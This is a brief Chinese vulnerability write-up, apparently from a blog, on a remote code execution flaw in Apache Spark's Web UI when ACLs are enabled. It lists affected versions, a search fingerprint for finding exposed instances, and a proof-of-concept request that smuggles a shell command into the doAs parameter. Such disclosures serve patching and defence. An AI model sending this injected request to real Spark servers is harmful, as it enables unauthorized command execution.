Apache Spark 支持启动 ACL 来为 Web UI 访问提供身份验证,当 ACL 启动时可以通过构造特殊请求用户名导致 RCE
Spark Core - Apache <=3.0.3
3.1.1 <= Spark Core - Apache <=3.1.2
3.2.0 <= Spark Core - Apache <=3.2.1
app="APACHE-Spark"
主页面
验证POC
/jobs/?doAs=`touch /tmp/test.txt`
456 篇文章
如果觉得我的文章对您有用,请随意打赏。你的支持将鼓励我继续创作!